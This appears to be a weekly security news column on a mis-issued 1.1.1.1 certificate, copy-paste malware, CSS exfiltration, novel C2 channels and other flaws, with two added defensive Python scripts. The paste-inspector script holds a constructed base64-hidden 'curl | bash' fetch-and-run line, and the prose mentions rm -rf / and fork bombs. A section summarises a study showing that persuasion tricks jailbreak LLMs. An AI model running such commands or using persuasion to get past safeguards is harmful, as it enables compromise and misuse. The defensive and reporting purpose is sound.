Something rather significant happened on the Internet back in May, and it seems that someone only noticed it on September 3rd. [Youfu Zhang] dropped a note on one of the Mozilla security mailing lists, pointing out that there was a certificate issued by Fina for 1.1.1.1. That IP address may sound familiar, and you may have questions.
First off, yes, TLS certificates can be issued for IP addresses. You can even get a numeric TLS certificate for your IP address, via Let's Encrypt. And second, 1.1.1.1 sounds familiar because that's Cloudflare's public DNS resolver. On that address, Cloudflare notably makes use of DoH, a charming abbreviation for DNS over HTTPS. The last important detail is that Cloudflare didn't request or authorize the certificate. Significant indeed.
This is a high-profile example of the major weakness of the TLS certificate system. There are over 300 trusted certificate authorities in the Microsoft Root Certificate Program, Financijska agencija (Fina) being one of them. All it takes to compromise that system is for one of those trusted roots to issue a bad certificate. That it took four months for someone to discover and point out the problem isn't great.
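One way an address owner could watch for this kind of issuance, as an added example that is not from the original column: it scans certificate records, such as a Certificate Transparency monitor might deliver, for watched IP addresses appearing under an issuer the owner does not use. The record field names, issuer names, serials and the 2001:db8::53 address are constructed assumptions.

```python
import ipaddress


def san_addresses(sans):
    """Return the set of IP addresses named in SAN strings like 'IP:1.1.1.1'."""
    found = set()
    for entry in sans:
        kind, _, value = entry.partition(":")
        # An address can also turn up in a DNS-type entry, so check both kinds.
        if kind.upper() not in ("IP", "DNS"):
            continue
        try:
            # ip_address() normalises spellings: 2001:DB8:0:0:0:0:0:53 == 2001:db8::53
            found.add(ipaddress.ip_address(value.strip()))
        except ValueError:
            pass  # an ordinary hostname, not an address
    return found


def unexpected_certs(records, watched, expected_issuers):
    """List (serial, issuer, addresses) for watched IPs certified by an unexpected issuer."""
    watch = {ipaddress.ip_address(a) for a in watched}
    alerts = []
    for rec in records:
        hits = san_addresses(rec["sans"]) & watch
        if hits and rec["issuer"] not in expected_issuers:
            alerts.append((rec["serial"], rec["issuer"], sorted(str(h) for h in hits)))
    return alerts


# Constructed records; issuers and serials are placeholders, not real certificates.
RECORDS = [
    {"serial": "01", "issuer": "Expected CA", "sans": ["DNS:resolver.example", "IP:1.1.1.1"]},
    {"serial": "02", "issuer": "Unrelated Root CA", "sans": ["DNS:test.example", "IP:1.1.1.1"]},
    {"serial": "03", "issuer": "Unrelated Root CA", "sans": ["IP:2001:DB8:0:0:0:0:0:53"]},
    {"serial": "04", "issuer": "Unrelated Root CA", "sans": ["DNS:shop.example", "IP:192.0.2.7"]},
]

if __name__ == "__main__":
    for alert in unexpected_certs(RECORDS, ["1.1.1.1", "2001:db8::53"], {"Expected CA"}):
        print("unexpected issuance:", alert)
```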
Don’t Just Copy That Into Your Terminal
I've advised Linux newbies several times not to be careless about copying and pasting commands into the Linux terminal. Sometimes that's because practical jokers suggest running rm -rf /, or a fork bomb, or some other "fun" command to fix a problem. But there's also the problem of malware, and it's not limited to Linux. For example, this reasonably convincing-looking notification from Cloudflare instructs the user to copy and paste a completely benign-looking string into a terminal on a Mac machine.
It’s pretty obviously not a real command as it’s presented. Instead, a base64 encoded string is decoded and executed in Bash. It executes a script from the Internet, which immediately begins looking for interesting files to upload. It’s not a terribly new approach, but is apparently still being used in the wild, and is a great object lesson about not trusting commands from the Internet.
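A way to look inside such a one-liner before it goes anywhere near a shell, as an added example that is not part of the original column: it decodes any base64 run in the pasted text, executes nothing, and reports whether the line pipes a decoder into a shell. The sample command, its example.invalid URL and the 16-character threshold are constructed assumptions.

```python
import base64
import binascii
import re

# Runs of base64 alphabet long enough to hide a command (threshold is an assumption).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# A decoder feeding an interpreter, e.g. `base64 -d | bash` (-D is the older macOS flag).
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:ba|z)?sh\b")
# Fetch-and-run tools worth flagging inside decoded text.
FETCHERS = re.compile(r"\b(?:curl|wget)\b")


def decode_blobs(command):
    """Return printable text decoded from base64 runs in `command`; nothing is executed."""
    decoded = []
    for run in B64_RUN.findall(command):
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
            text = raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text: ignore the run
        if text.isprintable():
            decoded.append(text)
    return decoded


def inspect_paste(command):
    """Summarise why a pasted one-liner deserves a second look."""
    hidden = decode_blobs(command)
    return {
        "decodes_into_shell": bool(DECODE_TO_SHELL.search(command)),
        "hidden_text": hidden,
        "hidden_fetch": any(FETCHERS.search(t) for t in hidden),
    }


# Constructed sample: a harmless-looking echo whose argument hides a fetch-and-run line.
PAYLOAD = "curl -s https://example.invalid/setup.sh | bash"
SAMPLE = 'echo "%s" | base64 -d | bash' % base64.b64encode(PAYLOAD.encode()).decode()

if __name__ == "__main__":
    print(SAMPLE)
    print(inspect_paste(SAMPLE))
```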
CSS is Turing Complete Now, So Let’s Use it to Steal Data
OK, Turing complete might be a slight exaggeration, but CSS does now have if() statements. CSS also can do background downloads from remote sites. Put that together, and you have a way to steal data.
There are some serious limitations that are likely to keep this from becoming a widely used technique. Top of the list is that CSS doesn't have any string carving functions. That if() statement is limited to matching the complete value of fields. To steal information strictly using CSS, you have to know what you're looking for ahead of time.
Creative C2
It’s always interesting to see the creative Command and Control (C2) techniques that are dreamt up by researchers and threat actors. MeetC2 is up first, a demonstration of using Google Calendar for C2 via calendar events. It works because no security solution will block access to Google Calendar, and it’s fairly trivial to add notes to a calendar event.
The other creative C2 involves a project I’m intimately familiar with. MeshC2 is a clever, but admittedly vibe-coded C2 tool using Meshtastic to run commands on remote hosts. It’s from [Eric Escobar], one of the researchers at Sophos. When dropping a Raspberry Pi off for a penetration test, there’s an inevitable problem that knocks the platform off the Internet, and the ability to run a few simple commands could make all the difference.
Persuasion and LLMs
Persuasion is the art of influencing. When a car salesman buys a potential customer a drink from the car lot's vending machine, it's an attempt to persuade. When a negotiator picks up on and imitates the small habits of their counterparts, it's also an attempt to leverage persuasion. From appeals to authority, to priming, to framing, there are countless tricks that are tried, with varying amounts of success, to influence people. The question here is whether those tricks might work on an LLM.
A pre-print study seems to indicate that persuasion does indeed work on AIs. And while persuasion may convince a human to buy a car beyond one’s means, persuasion can be used to convince an AI to do something beyond its guardrails. The two test cases were to ask the LLM to return an insult, and to return the recipe for lidocaine. While this isn’t the only way to jailbreak an LLM, it’s a novel bit of work, determining that the AI has some of the same weaknesses as humans.
The Scam Becomes Real
If you run your own mail server, or check your spam folder, you’ve surely seen the emails where a scammer claims to have taken over your webcam while you were watching pornography. Historically this has been a complete lie, simply to extort the naive. Unfortunately, it seems that someone took this as a challenge, and has actually built malware that attempts to do exactly what the classic spam has threatened. And of course, it’s open source.
Bits and Bytes
Researchers at Silent Signal took a look at the IBM i mainframe system, and have a CVE to show for it. The exploit was a replay attack followed by a command injection. The first approach allowed for blind code execution, but the challenge on this second time around was to find something more useful, and SQL turned out to be the key.
And finally, the folks at Trail of Bits are looking at the application integrity problem, when running applications inside Electron and even Chrome. The binaries themselves may be signed, but there's a part of the program that isn't: the heap snapshots. This is a V8 feature used to significantly speed up the loading of the pages inside these apps. It turns out that snapshot can also be used to poison the internal state of those apps, and sidestep existing controls. Electron has patched the issue, but there are some cases where Chrome itself may still be vulnerable to this fascinating approach.